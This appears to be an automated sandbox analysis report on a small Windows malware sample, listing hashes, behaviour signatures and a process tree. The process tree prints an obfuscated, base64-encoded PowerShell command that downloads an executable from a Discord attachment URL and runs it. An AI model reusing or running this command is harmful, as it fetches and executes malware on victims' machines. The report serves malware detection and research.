Analysis
-
max time kernel
176s -
max time network
254s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
03-12-2022 23:13
General
-
Target
asdsadasdsa.exe
-
Size
6KB
-
MD5
224ad38879a55ecc379737225d02b85c
-
SHA1
260cfe1499c16b381698a462f0997b105add2e9d
-
SHA256
599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6
-
SHA512
fd781fee26055eeb4eed26058146a5423684543099313c8d6f6c4f157e6484c89cc2d7180f5b82555ce5eb194e595bbb5ce4da8f3e0eba7b1bca27a2a66ce335
-
SSDEEP
96:I8J79BlBCF5NTcofNVIIKtgNtUqpkK77mc359ed3ojXrl:z9BuFDNNVI5ONtUqpkK77Rzeda
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\asdsadasdsa.exe"C:\Users\Admin\AppData\Local\Temp\asdsadasdsa.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/560-54-0x0000000000950000-0x0000000000958000-memory.dmpFilesize
32KB
-
memory/560-55-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmpFilesize
8KB
-
memory/1304-56-0x0000000000000000-mapping.dmp
-
memory/1304-58-0x000007FEF3AB0000-0x000007FEF44D3000-memory.dmpFilesize
10.1MB
-
memory/1304-60-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-59-0x000007FEF2E90000-0x000007FEF39ED000-memory.dmpFilesize
11.4MB
-
memory/1304-61-0x000000000282B000-0x000000000284A000-memory.dmpFilesize
124KB
-
memory/1304-62-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-63-0x0000000002824000-0x0000000002827000-memory.dmpFilesize
12KB
-
memory/1304-64-0x000000000282B000-0x000000000284A000-memory.dmpFilesize
124KB